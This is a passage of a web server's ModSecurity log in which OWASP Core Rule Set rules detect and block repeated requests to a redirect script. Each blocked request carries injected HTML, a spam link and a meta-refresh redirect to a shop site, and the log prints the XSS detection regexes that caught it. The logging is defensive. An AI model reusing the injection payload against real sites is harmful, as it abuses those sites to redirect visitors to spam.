"OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQFfdQaraX_prmqcQnAAAABg"]
[Tue May 12 01:50:24.067933 2026] [security2:error] [pid 1691274:tid 1691299] [client 27.78.84.116:63578] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQFfdQaraX_prmqcQnAAAABg"]
[Tue May 12 01:50:24.068589 2026] [security2:error] [pid 1691274:tid 1691299] [client 27.78.84.116:63578] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQFfdQaraX_prmqcQnAAAABg"]
[Tue May 12 01:50:24.068776 2026] [security2:error] [pid 1691274:tid 1691299] [client 27.78.84.116:63578] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQFfdQaraX_prmqcQnAAAABg"]
[Tue May 12 01:50:24.069171 2026] [security2:error] [pid 1691274:tid 1691299] [client 27.78.84.116:63578] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQFfdQaraX_prmqcQnAAAABg"]
[Tue May 12 01:50:24.069421 2026] [security2:error] [pid 1691274:tid 1691299] [client 27.78.84.116:63578] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQFfdQaraX_prmqcQnAAAABg"]
[Tue May 12 01:50:24.816021 2026] [security2:error] [pid 1730207:tid 1730219] [client 27.78.84.116:63660] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQDue9Sp-pIv_Bb6BhgAAAUo"]
[Tue May 12 01:50:24.816443 2026] [security2:error] [pid 1730207:tid 1730219] [client 27.78.84.116:63660] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQDue9Sp-pIv_Bb6BhgAAAUo"]
[Tue May 12 01:50:24.816599 2026] [security2:error] [pid 1730207:tid 1730219] [client 27.78.84.116:63660] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQDue9Sp-pIv_Bb6BhgAAAUo"]
[Tue May 12 01:50:24.816700 2026] [security2:error] [pid 1730207:tid 1730219] [client 27.78.84.116:63660] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQDue9Sp-pIv_Bb6BhgAAAUo"]
[Tue May 12 01:50:24.816872 2026] [security2:error] [pid 1730207:tid 1730219] [client 27.78.84.116:63660] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQDue9Sp-pIv_Bb6BhgAAAUo"]
[Tue May 12 01:50:24.817280 2026] [security2:error] [pid 1730207:tid 1730219] [client 27.78.84.116:63660] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQDue9Sp-pIv_Bb6BhgAAAUo"]
[Tue May 12 01:50:24.817556 2026] [security2:error] [pid 1730207:tid 1730219] [client 27.78.84.116:63660] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQDue9Sp-pIv_Bb6BhgAAAUo"]
[Tue May 12 01:50:25.589340 2026] [security2:error] [pid 1707624:tid 1707687] [client 27.78.84.116:63745] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQbOxS7i6i_mT2NK6uAAAAEU"]
[Tue May 12 01:50:25.596570 2026] [security2:error] [pid 1707624:tid 1707687] [client 27.78.84.116:63745] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQbOxS7i6i_mT2NK6uAAAAEU"]
[Tue May 12 01:50:25.596921 2026] [security2:error] [pid 1707624:tid 1707687] [client 27.78.84.116:63745] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQbOxS7i6i_mT2NK6uAAAAEU"]
[Tue May 12 01:50:25.597030 2026] [security2:error] [pid 1707624:tid 1707687] [client 27.78.84.116:63745] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQbOxS7i6i_mT2NK6uAAAAEU"]
[Tue May 12 01:50:25.597206 2026] [security2:error] [pid 1707624:tid 1707687] [client 27.78.84.116:63745] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQbOxS7i6i_mT2NK6uAAAAEU"]
[Tue May 12 01:50:25.597627 2026] [security2:error] [pid 1707624:tid 1707687] [client 27.78.84.116:63745] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQbOxS7i6i_mT2NK6uAAAAEU"]
[Tue May 12 01:50:25.597891 2026] [security2:error] [pid 1707624:tid 1707687] [client 27.78.84.116:63745] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQbOxS7i6i_mT2NK6uAAAAEU"]
[Tue May 12 01:50:26.316003 2026] [security2:error] [pid 1695975:tid 1695993] [client 27.78.84.116:63841] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQtVI9ymHBxup749_xgAAAI8"]
[Tue May 12 01:50:26.316641 2026] [security2:error] [pid 1695975:tid 1695993] [client 27.78.84.116:63841] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQtVI9ymHBxup749_xgAAAI8"]
[Tue May 12 01:50:26.316807 2026] [security2:error] [pid 1695975:tid 1695993] [client 27.78.84.116:63841] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQtVI9ymHBxup749_xgAAAI8"]
[Tue May 12 01:50:26.316911 2026] [security2:error] [pid 1695975:tid 1695993] [client 27.78.84.116:63841] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQtVI9ymHBxup749_xgAAAI8"]
